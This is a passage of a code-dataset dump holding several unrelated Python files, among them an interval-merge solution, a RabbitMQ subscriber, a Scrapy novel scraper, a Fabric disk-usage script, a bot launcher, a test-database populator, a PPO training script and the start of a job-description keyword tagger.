partial overlap\n            elif x[0] <= y[0] <= x[1]:\n                m2 = [[x[0], y[1]]]\n            #print(\"Merged two intervals \", x, y, m2)\n            return m2\n\n        # Merges 3 sorted intervals\n        def merge3(x, y, z):\n            m2 = merge2(x, y)\n            m3 = []\n            if len(m2) == 1:\n                m3 = merge2(m2[0], z)\n            else:\n                m3 = [m2[0]] + merge2(m2[1], z)\n            #print(\"Merged three intervals \", x, y, z, m3)\n            return m3\n\n        # Finds floor interval\n        def findMergeInterval(intervals, val):\n            start = 0\n            end = len(intervals)-1\n            res = 0\n            while start <= end:\n                mid = (start + end) // 2\n                if intervals[mid][0] <= val:\n                    res = mid\n                    start = mid + 1\n                else:\n                    end = mid - 1\n            #print(\"Found merge interval index for \", val, \" to be \", res)\n            return res\n\n        # Intervals are non-overlapping\n        sz = len(intervals)\n        if not sz:\n            return [newInterval]\n        start = findMergeInterval(intervals, newInterval[0])\n        end = findMergeInterval(intervals, newInterval[1])\n        # TODO: simplify using mergeN\n        if start == end:\n            m3 = merge2(newInterval, intervals[start])\n        else:\n            m3 = merge3(intervals[start], newInterval, intervals[end])\n        return intervals[:start] + m3 + intervals[end+1:]\n\n# @lc code=end\n","sub_path":"57.insert-interval.py","file_name":"57.insert-interval.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"322450781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 11:48:21 2020\n\n@author: dormoyc\n\"\"\"\n\nimport pika\nimport mykeys\n\namqpurl = mykeys.cloudamqplink\nmyQueue = \"myWorkingQueue\"\n\ndef callback(ch, method, properties, body):\n    print (\" [x] Received %r\" % body)\n\n\nconnection = pika.BlockingConnection(pika.URLParameters(amqpurl))\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='logs',\n                         exchange_type='fanout')\nresult = channel.queue_declare(queue='', exclusive=True)\nqueue_name = result.method.queue\n\nchannel.queue_bind(exchange='logs',\n                   queue=myQueue)\n\nchannel.basic_consume(callback,\n                      queue=myQueue,\n                      no_ack=True)\n\n# without this the script declares everything and exits before consuming anything\nchannel.start_consuming()\n","sub_path":"Session4/read_suscriber.py","file_name":"read_suscriber.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"229225292","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom pymongo import MongoClient\n\n\n# scrapy crawl biqukan --nolog\nclass BiqukanSpider(scrapy.Spider):\n    print(\"*************************************************************************\")\n    print(\"\\n\\t\\tWelcome to the Biqukan novel download tool\\n\\n\\t\\tAuthor: NJ宇众不同\\tDate: 2019-02-17\\n\")\n    print(\"*************************************************************************\")\n\n    # novel table-of-contents URL\n    # target_url = str(input(\"Please enter the novel's table-of-contents URL:\\n\"))\n\n    name = 'biqukan'\n    allowed_domains = ['biqukan.com']\n    start_urls = ['https://www.biqukan.com/57_57405/']\n\n    # open the MongoDB connection\n    client = MongoClient('localhost', 27017)\n    # select the database we need\n    db = client.biqukan\n    # select the collection, i.e. what we would usually call a table\n    collection = db.novel\n\n    def parse(self, response):\n        # extract the novel's basic information\n        # novel title\n        novel_name = response.xpath('.//div[@class=\"info\"]//h2//text()').extract()\n        if novel_name:\n            flag_name = \"《\" + novel_name[0] + \"》\" + \"正文卷\"\n            print(\"flag_name====\", flag_name)\n\n        # extract the chapter information\n        # chapter list\n        chapters = response.xpath('.//div[@class=\"listmain\"]//dl//dt | .//div[@class=\"listmain\"]//dl//dd')\n        # print(chapters)\n        begin_flag = False\n        for child in chapters:\n            # print(child)\n            if child != '\\n':\n                # only extract main-text chapters\n                if child.xpath('.//text()').extract()[0] == u\"%s\" % flag_name:\n                    begin_flag = True\n                if begin_flag == True and len(child.xpath('.//a')) > 0:\n                    aMark = child.xpath('.//a')\n                    chapterHref = aMark.xpath('@href').extract()\n                    download_url = \"https://www.biqukan.com\" + chapterHref[0]\n                    yield scrapy.Request(url=download_url, callback=self.parse)\n        chapter_name = response.xpath('.//div[@class=\"content\"]//h1//text()').extract()\n        # print(chapter_name)\n        if chapter_name:\n            chapter_content = response.xpath('.//div[@id=\"content\" and @class=\"showtxt\"]//text()').extract()\n            # print(chapter_content[0])\n            # soup_text = chapter_content[0].replace('\\xa0', '')\n            # print(chapter_content)\n            self.saveNovel(chapter_name[0], chapter_content)\n\n    # insert a document into the collection\n    # https://www.biqukan.com/0_973/276441.html\n    def saveNovel(self, name, text):\n        content = \"\"\n        for each in text:\n            content += each.replace('\\xa0', '')\n\n        if self.findNovelByName(name) is None:\n            print(\"==== saving data ====\")\n            self.collection.insert(\n                {\n                    \"name\": name,\n                    \"content\": content,\n                }\n            )\n\n    # query the collection by name\n    def findNovelByName(self, name):\n        print(\"==== looking up data ====\")\n        res = self.collection.find_one({\"name\": name})\n        print(res)\n        return res\n","sub_path":"biqukan_pro/biqukan_pro/spiders/biqukan.py","file_name":"biqukan.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"430751505","text":"from fabric import Connection\nfrom fabric import SerialGroup\n\ndef disk_free(c):\n    uname = c.run('uname -s',hide=True)\n    if 'Linux' in uname.stdout:\n        command = \"df -h\"  # report disk usage; the original \"free -h\" showed memory, not disk\n        return c.run(command,hide=True).stdout.strip()\n    else:\n        print(\"Linux not found in uname\")\n\n\nfor conn in SerialGroup('192.168.121.157','192.168.121.163'):\n    print(f\"{conn} : {disk_free(conn)}\")\n\n\n#192.168.121.157 : 48%\n","sub_path":"multiple2.py","file_name":"multiple2.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"200219131","text":"import sys\nimport argparse\nimport subprocess\n\n\ndef parse_cli_args():\n    parser = argparse.ArgumentParser(\n        description=\"Firetail - An EVE Online Discord Bot\")\n    parser.add_argument(\n        \"--no-restart\", \"-r\",\n        help=\"Disables auto-restart.\", action=\"store_true\")\n    parser.add_argument(\n        \"--debug\", \"-d\", help=\"Enables debug mode.\", action=\"store_true\")\n    return parser.parse_known_args()\n\n\ndef main():\n    print('''\n     ______ _          _        _ _ \\n\n    |  ____(_)        | |      (_) |   \\n\n    | |__   _ _ __ ___| |_ __ _ _| |   \\n\n    |  __| | | '__/ _ \\ __/ _` | | |   \\n\n    | |    | | | |  __/ || (_| | | |   \\n\n    |_|    |_|_|  \\___|\\__\\__,_|_|_|   \\n\n    ''')\n\n    if sys.version_info < (3, 5, 0):\n        print(\"ERROR: Minimum Python version not met.\\n\"\n              \"Firetail requires Python 3.5 or higher.\\n\")\n        return\n\n    print(\"Launching Firetail...\", end=' ', flush=True)\n\n    launch_args, ft_args = parse_cli_args()\n\n    if launch_args.debug:\n        ft_args.append('-d')\n\n    ft_args.append('-l')\n\n    while True:\n        code = subprocess.call([\"firetail-bot\", *ft_args])\n        if code == 0:\n            print(\"Goodbye!\")\n            break\n        elif code == 26:\n            print(\"Rebooting! I'll be back in a bit!\\n\")\n            continue\n        else:\n            if launch_args.no_restart:\n                break\n            print(\"I crashed! 
Trying to restart...\\n\")\n print(\"Exit code: {exit_code}\".format(exit_code=code))\n sys.exit(code)\n","sub_path":"firetail/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168227615","text":"# -*- coding: utf8 -*-\nimport datetime\nimport random\nimport re\n\nfrom zeeguu.model import Article\nfrom zeeguu.model.exercise import Exercise\n\nfrom zeeguu.model.url import Url\nfrom zeeguu.model.text import Text\nfrom zeeguu.model.exercise_outcome import ExerciseOutcome\nfrom zeeguu.model.exercise_source import ExerciseSource\nfrom zeeguu.model.user_word import UserWord\nfrom zeeguu.model.bookmark import Bookmark\nfrom zeeguu.model.language import Language\nfrom zeeguu.model.user import User\n\nWORD_PATTERN = re.compile(\"\\[?([^{\\[]+)\\]?( {[^}]+})?( \\[[^\\]]\\])?\")\n\nTEST_PASS = 'test'\nTEST_EMAIL = 'i@mir.lu'\n\nTEST_BOOKMARKS_COUNT = 2\n\ndef drop_current_tables(db):\n # We have to do a commit() before the drop_all()\n # Otherwise the system just freezes sometimes!\n db.session.commit()\n db.session.close_all()\n # Initial cleanup\n db.reflect()\n db.drop_all()\n # Creating the tables again\n db.create_all()\n\n\ndef add_bookmark(db, user, original_language, original_word, translation_language, translation_word, date, the_context,\n the_url, the_url_title):\n session = db.session\n\n url = Url.find_or_create(session, the_url, the_url_title)\n\n article = Article.find_or_create(session, url.as_string())\n\n text = Text.find_or_create(session, the_context, translation_language, url, article)\n\n origin = UserWord.find_or_create(session, original_word, original_language)\n\n translation = UserWord.find_or_create(session, translation_word, translation_language)\n\n b1 = Bookmark(origin, translation, user, text, date)\n db.session.add(b1)\n db.session.commit()\n\n return b1\n\n\n#\ndef create_minimal_test_db(db):\n drop_current_tables(db)\n\n # Some common test fixtures\n de = Language(\"de\", \"German\")\n en = Language(\"en\", \"English\")\n nl = Language(\"nl\", \"Dutch\")\n es = Language(\"es\", \"Spanish\")\n fr = Language(\"fr\", \"French\")\n cn = Language(\"zh-CN\", \"Chinese\")\n\n db.session.add_all([en, de, nl, es, fr, cn]);\n\n mir = User(TEST_EMAIL, \"Mircea\", TEST_PASS, de, en)\n\n db.session.add(mir)\n\n show_solution = ExerciseOutcome(\"Show solution\")\n retry = ExerciseOutcome(\"Retry\")\n correct = ExerciseOutcome(\"Correct\")\n wrong = ExerciseOutcome(\"Wrong\")\n typo = ExerciseOutcome(\"Typo\")\n too_easy = ExerciseOutcome(\"Too easy\")\n\n outcomes = [show_solution, retry, correct, wrong, typo, too_easy]\n\n db.session.add_all(outcomes)\n\n recognize = ExerciseSource(\"Recognize\")\n translate = ExerciseSource(\"Translate\")\n\n sources = [recognize, translate]\n\n db.session.add_all(sources)\n\n b1 = add_bookmark(db, mir, de, \"Schaf\", en, \"sheep\",\n datetime.datetime(2011, 1, 1, 1, 1, 1),\n \"Bitte... 
zeichne mir ein Schaf!\",\n \"http://www.derkleineprinz-online.de/text/2-kapitel/\",\n \"Der Kleine Prinz - Kapitel 2\")\n\n b2 = add_bookmark(db, mir, de, \"sprang\", en, \"jumped\",\n datetime.datetime(2011, 1, 1, 1, 1, 1),\n \"Ich sprang auf die Fusse.\",\n \"http://www.derkleineprinz-online.de/text/2-kapitel/\",\n \"Der Kleine Prinz - Kapitel 2\")\n\n bookmarks = [b1, b2]\n\n for i in range(0, 5):\n random_source = sources[random.randint(0, len(sources) - 1)]\n random_outcome = outcomes[random.randint(0, len(outcomes) - 1)]\n random_solving_speed = random.randint(500, 5000)\n exercise = Exercise(random_outcome, random_source,\n random_solving_speed, datetime.datetime.now())\n random_bookmark = bookmarks[random.randint(0, len(bookmarks) - 1)]\n random_bookmark.add_new_exercise(exercise)\n\n global TEST_BOOKMARKS_COUNT\n TEST_BOOKMARKS_COUNT = 2\n db.session.commit()\n","sub_path":"zeeguu/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"440136235","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n \nimport roslib\nroslib.load_manifest('yolov3_transfer')\nimport sys\nimport rospy\nimport cv2\nimport time\nimport numpy as np\nfrom pylab import *\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom tracking_object import Detected_object\nsys.path.append(\"..\")\nfrom my_yolo_track.msg import TrackInfos\nfrom my_yolo_track.msg import TrackInfo\n\n\nclass image_converter:\n \n def __init__(self):\n self.net = cv2.dnn.readNet(\"../weights/yolov3.weights\",\"../cfg/yolov3.cfg\")\n self.classes = []\n with open(\"coco.names\",\"r\") as f:\n self.classes = [line.strip() for line in f.readlines()]\n #print(classes)\n self.layer_names = self.net.getLayerNames()\n self.output_layers = [self.layer_names[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\n self.colors = np.random.uniform(0,255,size = (len(self.classes),3))\n \n self.det_objs = TrackInfos()\n self.yolo_finish_flag = False\n self.color_dif_confidance = 0.1\n\n self.image_pub = rospy.Publisher(\"pub_image_yolov3\",Image,queue_size=10)\n self.info_pub = rospy.Publisher(\"pub_track_info\",TrackInfos,queue_size=10)\n \n self.bridge = CvBridge()\n # subscribe image\n self.rgb_image_sub = rospy.Subscriber(\"/camera/rgb/image_raw\",Image,self.callback_rgb)\n self.depth_image_sub = rospy.Subscriber(\"/camera/depth/image_raw\",Image,self.callback_depth)\n self.font = cv2.FONT_HERSHEY_PLAIN\n self.starting_time = time.time()\n self.frame_id = 0 # frame counter, to calculate the fps by using (the number of frame) / (elapsed_time)\n self.track_counter = 0\n \n \n def callback_rgb(self,data):\n try:\n frame = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n self.frame_id += 1\n #_, frame = cv_image\n except CvBridgeError as e:\n print(e)\n \n #cv2.imshow(\"image window\",frame)\n (rows,cols,channels) = frame.shape\n \n #cv2.imshow(\"Image window\", frame)\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\n self.net.setInput(blob)\n outs = self.net.forward(self.output_layers)\n\n print(\"rgb_image\")\n print(cols)\n print(rows)\n \n # Showing informations on the screen\n class_ids = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.2:\n # 
Object detected\n center_x = int(detection[0] * cols)\n center_y = int(detection[1] * rows)\n w = int(detection[2] * cols)\n h = int(detection[3] * rows)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.8, 0.3)\n \n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n label = str(self.classes[class_ids[i]])\n confidence = confidences[i]\n color = self.colors[class_ids[i]]\n color_total_r = 0.0\n color_total_g = 0.0\n color_total_b = 0.0\n object_id = \"\"\n counter_pixel = 0\n\n a = x\n b = y # index for getting all pixels color information in boxes\n print(\"x,y,w,h\")\n print(x,y,w,h)\n\n # transversal all the pixels surrounded by this bounding box\n while(a <= x+w-1):\n b = y\n while(b <= y+h-1):\n color_total = frame[b,a]\n color_total_b += color_total[0]\n color_total_g += color_total[1]\n color_total_r += color_total[2]\n b += 1\n counter_pixel += 1\n a +=1\n \n color_b_now = color_total_b / counter_pixel\n color_g_now = color_total_g / counter_pixel\n color_r_now = color_total_r / counter_pixel # the average color(bgr) information in percentage of the detected boxes\n \n print(\"color_b_now,color_g_now,color_r_now\")\n print(color_b_now,color_g_now,color_r_now)\n\n saved_object_flag = False\n det_objs_num = len(self.det_objs.tracking_objects)\n # start to compare two frames' color difference\n for j in range(0,det_objs_num,1):\n tracking_object_self = self.det_objs.tracking_objects[j]\n color_dif_b = abs((color_b_now - tracking_object_self.color_b)/tracking_object_self.color_b)\n color_dif_g = abs((color_g_now - tracking_object_self.color_g)/tracking_object_self.color_g)\n color_dif_r = abs((color_r_now - tracking_object_self.color_r)/tracking_object_self.color_r)\n print(\"self_color\")\n print(tracking_object_self.color_b,tracking_object_self.color_g,tracking_object_self.color_r)\n \n if ((tracking_object_self.track_class == label) and (color_dif_b < self.color_dif_confidance) and \n (color_dif_g < self.color_dif_confidance) and (color_dif_r < self.color_dif_confidance)):\n print(\"saved object detected!\")\n tracking_object_self.center_x = x + w/2\n tracking_object_self.center_y = y + h/2\n tracking_object_self.color_b = color_b_now\n tracking_object_self.color_g = color_g_now\n tracking_object_self.color_r = color_r_now\n object_id = str(tracking_object_self.track_id)\n saved_object_flag = True\n \n if(saved_object_flag == False):\n print(\"no saved object detected, new object added\")\n self.track_counter += 1\n det_obj = TrackInfo()\n det_obj.center_x = x + w/2\n det_obj.center_y = y + h/2\n det_obj.track_class = label\n det_obj.track_id = self.track_counter\n det_obj.color_b = color_b_now\n det_obj.color_g = color_g_now\n det_obj.color_r = color_r_now\n self.det_objs.tracking_objects.append(det_obj)\n object_id = str(det_obj.track_id)\n\n \n cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n cv2.putText(frame, label + object_id + \" \" + str(round(confidence, 2)), (x, y + 30), self.font, 1, color, 1)\n \n \n elapsed_time = time.time() - self.starting_time\n fps = self.frame_id / elapsed_time\n cv2.putText(frame, \"FPS: \" + str(round(fps, 2)), (10, 50), self.font, 4, (0, 0, 0), 3)\n\n cv2.imshow(\"Image window\", frame)\n cv2.waitKey(3)\n \n try:\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n \n 
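# NOTE (added): setting this flag releases the busy-wait loop in\n        # callback_depth(), which spins until the RGB pass has refreshed\n        # self.det_objs. A threading.Event would make that handshake explicit\n        # and avoid spinning; a sketch, assuming self.yolo_done = threading.Event()\n        # is created in __init__:\n        #     self.yolo_done.set()                           # here\n        #     self.yolo_done.wait(); self.yolo_done.clear()  # in callback_depth\n        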
self.yolo_finish_flag = True\n\n\n def callback_depth(self,data):\n self.yolo_finish_flag = False\n #cv2.imshow(\"depth window\",depth_image)\n try:\n frame = self.bridge.imgmsg_to_cv2(data, \"32FC1\")\n \n except CvBridgeError as e:\n print(e)\n print(\"depth_image\")\n print(data.width)\n print(data.height)\n image_width = data.width\n image_height = data.height\n\n while True:\n if(self.yolo_finish_flag == True):\n break\n print(\"while loop end!\")\n print(self.det_objs.tracking_objects[0].track_class)\n for i in range(len(self.det_objs.tracking_objects)):\n tracking_depth_self = self.det_objs.tracking_objects[i]\n \n float_distance = frame[tracking_depth_self.center_y,tracking_depth_self.center_x]\n tracking_depth_self.distance = float_distance \n print(\"distance\")\n print(tracking_depth_self.distance)\n\n print(\"self.det_objs[]\")\n print(self.det_objs)\n self.info_pub.publish(self.det_objs)\n\n \n\n \ndef main(args):\n rospy.init_node('image_converter', anonymous=True)\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main(sys.argv)","sub_path":"my_yolo_track/scripts/real_time_yolo.py","file_name":"real_time_yolo.py","file_ext":"py","file_size_in_byte":9193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"468160008","text":"import gym\n\nfrom stable_baselines.common.policies import MlpPolicy\nfrom stable_baselines.common.vec_env import DummyVecEnv, VecNormalize\nfrom stable_baselines import PPO2\nfrom stable_baselines import PPO1\nfrom particle_env_continuous import PrticleEnv\nimport os\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n # env = gym.make('CartPole-v1')\n env = DummyVecEnv([lambda: PrticleEnv(alpha=1,beta=10,win_thre=1, max_timestep=256)])\n # Optional: PPO2 requires a vectorized environment to run\n # the env is now wrapped automatically when passing it to the constructor\n # env = DummyVecEnv([lambda: env])\n # env = VecNormalize(env, norm_obs=True, norm_reward=False,\n # clip_obs=10.)\n\n\n save_name = \"ppo1_coninuous_exp3\"\n if not os.path.exists(save_name):\n os.makedirs(save_name)\n # model = PPO2(MlpPolicy, env, verbose=0,tensorboard_log=\"./ppo2_particle_tensorboard/\",n_cpu_tf_sess=1)\n model = PPO1(MlpPolicy,env,verbose=0,\\\n timesteps_per_actorbatch=256,\n tensorboard_log=save_name,\\\n policy_kwargs={\"net_arch\": [dict(vf=[64,64,64], pi=[64,64,64])]},\\\n optim_stepsize = 3e-4,\n optim_batchsize=256,\n optim_epochs = 4,\n schedule='linear',\n n_cpu_tf_sess=16)\n model.learn(total_timesteps=int(2e7))\n model.save(save_name)\n\n del model # remove to demonstrate saving and loading","sub_path":"ppo1_coninuous_exp3.py","file_name":"ppo1_coninuous_exp3.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"231932700","text":"# JOB TAGGER // INTERN PROJECT SUMMER 18 // RIVIERA PARTNERS\n\nimport pandas as pd\nimport re\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport os\nfrom random import shuffle\nimport csv\nimport string\nimport math\nimport spacy\nfrom fuzzywuzzy import process\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport fastText\nfrom fastText import util\nfrom typing import List\nimport operator\nfrom collections import Counter\nfrom tqdm import tqdm\n\n# setup pandas dataframe of job descriptions file\nfile = 
'job_descriptions_with_freeform.csv'\ndf = pd.read_csv(file)\n\nlanguages = ['abap', 'actionscript', 'ada', 'apex', 'arc', 'asp', 'assembly', 'ats', 'awk', 'c',\n\t'c#', 'c++', 'clips', 'clojure', 'cobol', 'coffeescript', 'coldfusion', 'css', 'css3',\n\t'dart', 'dm', 'erlang', 'factor', 'flex', 'forth', 'fortran', 'go', 'groovy',\n\t'handlebars', 'html', 'html5', 'idl', 'java', 'javascript', 'labview', 'liquid',\n\t'lisp', 'logo', 'lua', 'matlab', 'max', 'mercury', 'monkey', 'objective-c', 'pan',\n\t'pascal', 'perl', 'php', 'plsql', 'postscript', 'powershell', 'puppet', 'python', 'r',\n\t'ruby', 'sas', 'scala', 'scheme', 'shell', 'smalltalk', 'sql', 'swift', 'verilog',\n\t'vhdl', 'visual basic', 'xml', 'xquery', 'xslt']\n\ntechnologies = ['.net', 'accumulo', 'actionhero.js', 'activemq', 'activerecord reputation system',\n\t'aerospike', 'airavata', 'airflow', 'airmapview', 'algolia', 'amazon aurora',\n\t'amazon lambda', 'amazon rds', 'amazon route 53', 'ambari', 'android sdk',\n\t'angularjs', 'ansible', 'apache ant', 'apache apr', 'apache aurora',\n\t'apache camel', 'apache commons', 'apache continuum', 'apache crunch',\n\t'apache curator', 'apache drill', 'apache etch', 'apache flex', 'apache forrest',\n\t'apache graphics', 'apache hbase', 'apache james', 'apache lens', 'apache lucy',\n\t'apache mina', 'apache ode', 'apache perl', 'apache phoenix', 'apache pig',\n\t'apache poi', 'apache reef', 'apache server', 'apache sling', 'apache steve',\n\t'apache storm', 'apache subversion', 'apache tiles', 'apache velocity',\n\t'apache wink', 'apache workbench', 'apportable', 'archiva', 'arduino', 'aries',\n\t'asgard', 'atmosphere', 'aura', 'avro', 'aws rds', 'axis', 'azkaban',\n\t'backbone.js', 'big r', 'bigsql', 'bigtop', 'bloodhound', 'bookkeeper',\n\t'bootstrap', 'bourbon', 'bower', 'breakoutdetection', 'buildr', 'bval', 'cakephp',\n\t'calcite', 'camus', 'capistrano', 'cassandra', 'cayenne', 'celix', 'ceph',\n\t'cfengine', 'chaplin', 'chef', 'chukwa', 'circleci', 'clerezza', 'cloudfront',\n\t'cloudsearch', 'cloudstack', 'cocoa', 'cocoa touch', 'cocoon', 'compass',\n\t'cordova', 'couchbase', 'couchdb', 'creadur', 'crosswalk', 'cucumber', 'cuda',\n\t'cxf', 'dapper', 'data pipeline', 'databus', 'dataloader', 'datomic',\n\t'deeplinkdispatch', 'devicemap', 'devise', 'django', 'docker', 'draft.js',\n\t'dremel', 'dropwizard', 'durandal', 'dust', 'dustjs', 'dynamodb', 'ec2',\n\t'effective scala', 'ejabberd', 'elastic beanstalk', 'elastic mapreduce',\n\t'elasticache', 'elasticsearch', 'electron', 'ember.js', 'empire-db', 'emr',\n\t'enzyme', 'espresso.js', 'eureka', 'exhibitor', 'expressjs', 'f1',\n\t'facebook conceal', 'facebook flow', 'facebook flux', 'facebook origami',\n\t'facebook presto', 'falcon', 'fatcache', 'felix', 'finagle', 'firebase', 'flash',\n\t'flask', 'flink', 'flume', 'folly', 'framework7', 'freebase', 'fresco', 'fuelphp',\n\t'g2', 'gearman', 'geronimo', 'giraph', 'glusterfs', 'gobblin',\n\t'google closure library', 'gora', 'gpfs', 'grails', 'grape', 'graphql', 'gump',\n\t'gunicorn', 'hadoop', 'hama', 'handlebars.js', 'hapi', 'haproxy', 'helix', 'hhvm',\n\t'hibernate', 'hive', 'hopscotch', 'http server', 'httpcomponents', 'hystrix',\n\t'iago', 'ibm db2', 'ibm hbase', 'ignite', 'iis', 'immutable-js', 'impala', 'infer',\n\t'infinity', 'influxdb', 'informix', 'io.js', 'ionic', 'isis', 'jackrabbit', 'jade',\n\t'jclouds', 'jekyll', 'jena', 'jenkins', 'jest', 'jetty', 'jmeter', 'jquery',\n\t'jquery.payment', 'juddi', 'juniversal', 'kafka', 'karaf', 'kinesis', 'knox',\n\t'kohana', 'kubernetes', 
'kvocontroller', 'kylin', 'labella.js', 'laravel', 'less',\n\t'leveldb', 'libcloud', 'lift framework', 'lighttpd', 'linux', 'lucene',\n\t'lucene.net', 'lumen', 'luminol', 'macgap', 'mahout', 'manhattan', 'manifoldjs',\n\t'marionette', 'marmotta', 'martini', 'material ui', 'materialize', 'maven',\n\t'mcrouter', 'memcached', 'mention-bot', 'mesos', 'metamodel', 'meteor',\n\t'miniprofiler', 'mithril', 'mnesia', 'mongodb', 'mono', 'mozilla brick', 'mrunit',\n\t'msmq', 'mustache', 'myfaces', 'mysql', 'neo4j', 'netty', 'nginx', 'nifi',\n\t'node.js', 'nodejs', 'nuclide', 'numpy', 'nutch', 'ofbiz', 'olingo', 'oodt',\n\t'oozie', 'openjpa', 'openlayers', 'openmeetings', 'opennlp', 'openoffice',\n\t'openstack', 'oracle database', 'orc', 'ormlite', 'padrino', 'paldb', 'parquet',\n\t'pathpicker', 'pdfbox', 'pfff', 'phalcon', 'phonegap', 'pinball', 'pincache',\n\t'pinot', 'pinremoteimage', 'play framework', 'polyglot.js', 'polymer', 'portals',\n\t'postcss lang optimizer', 'postgresql', 'primer', 'protocol buffers', 'proxygen',\n\t'pure.css', 'purifycss', 'pyexchange', 'pylons', 'qark', 'qpid', 'rabbitmq',\n\t'rails', 'react', 'react native', 'rebound', 'redis', 'redshift', 'relay',\n\t'requirejs', 'resque', 'rest.li', 'revel', 'rocksdb', 'sails.js', 'samza', 'sass',\n\t'scalding', 'scikit-learn', 'scipy', 'score pmml', 'scumblr', 'secure headers',\n\t'sensei', 'sequins', 'serf', 'servicemix', 'servicestack', 'shiro', 'shop',\n\t'simian army', 'simpledb', 'sinatra', 'skeleton', 'slim', 'smarty', 'solr',\n\t'spamassassin', 'spanner', 'spark', 'sphinx', 'spring', 'sql server', 'sqlite',\n\t'sqoop', 'squid', 'stanbol', 'stetho', 'stratos', 'struts', 'stylus', 'suit css',\n\t'sumingbird', 'symfony', 'synapse', 'syncope', 'tajo', 'tapestry', 'tastypie',\n\t'tcl', 'teamcity', 'tensorflow', 'tez', 'thrift', 'tika', 'timberlake', 'tomcat',\n\t'tomee', 'travis ci', 'turbine', 'tuscany', 'tweaks', 'twitter commons', 'twui',\n\t'uikit', 'uima', 'unix', 'usergrid', 'vagrant', 'varnish', 'vcl', 'vivisimo',\n\t'voldemort', 'vxquery', 'watson', 'wdt', 'webapp2', 'wherehows', 'wicket', 'xalan',\n\t'xamarin', 'xerces', 'xmlbeans', 'yesod', 'yii', 'zend framework', 'zeromq',\n\t'zest', 'zookeeper', 'ios sdk']\n\nskills = ['AI', 'Android', 'api', 'automated deployment',\n\t'automated software development', 'bayesian', 'big data', 'business intelligence',\n\t'change management', 'cicd', 'classification', 'cloud', 'cloud compute',\n\t'configuration management', 'containerization',\n\t'content management', 'continuous delivery', 'continuous deployment',\n\t'continuous integration', 'cryptography', 'dal', 'data analysis', 'data analyst',\n\t'data analytics', 'data ingestion', 'data mining', 'data pipelines',\n\t'data processing', 'data visualization', 'data warehousing', 'deep learning',\n\t'delivery pipeline', 'devops integration', 'distributed systems', 'dwbi', 'etl',\n\t'failover', 'fault tolerant', 'fibre channel',\n\t'file system', 'i/o', 'iaas', 'image processing', 'infrastructure',\n\t'infrastructure engineer', 'intrusion', 'ios', 'ip', 'load balance',\n\t'machine learning', 'mapreduce', 'messaging',\n\t'microservices', 'mining', 'ml', 'modeling', 'monitoring', 'msa', 'multithread',\n\t'multithreaded', 'multitier', 'mvc', 'n-tier', 'nas', 'network',\n\t'network programming', 'nlp', 'orchestration', 'paas', 'penetration testing',\n\t'performance', 'petabyte', 'platform', 'platform engineer', 'regression',\n\t'reinforcement learning', 'release', 'responsive',\n\t'rest services', 'restful', 'scraping', 'signal 
processing',\n\t'soa', 'soap', 'socket', 'spa', 'statistics', 'storage', 'storage system',\n\t'supervised learning', 'svm', 'tcp',\n\t'unsupervised learning', 'virtualization', 'visualization', 'vulnerability',\n\t'reliability', 'aws']\n\n\ndef get_words(x):\n\tno_html = re.sub(r'\\<.*?\\>', ' ', x)\n\tno_amps = re.sub(r'&.*? ', ' ', no_html)\n\n\tformatted = bytes(no_amps, 'utf-8').decode('utf-8', 'ignore')\n\n\tone = re.sub(r'[^A-Za-z0-9+]+', ' ', formatted)\n\ttwo = re.sub(r'[^+\\w\\s]',' ',one)\n\tthree = re.sub(r'/', ' ', two)\n\n\treturn three\n\n\ndef similarity_score(x, y):\n\n\tmodel = fastText.load_model('new_output.bin')\n\n\tv1 = model.get_word_vector(x)\n\n\tv2 = model.get_word_vector(y)\n\n\treturn cosine_similarity(v1, v2)\n\n\n\nVector = List[float]\n\ndef vector_len(v: Vector) -> float:\n return math.sqrt(sum([x*x for x in v]))\n\n\ndef dot_product(v1: Vector, v2: Vector) -> float:\n assert len(v1) == len(v2)\n return sum([x*y for (x,y) in zip(v1, v2)])\n\n\ndef cosine_similarity(v1: Vector, v2: 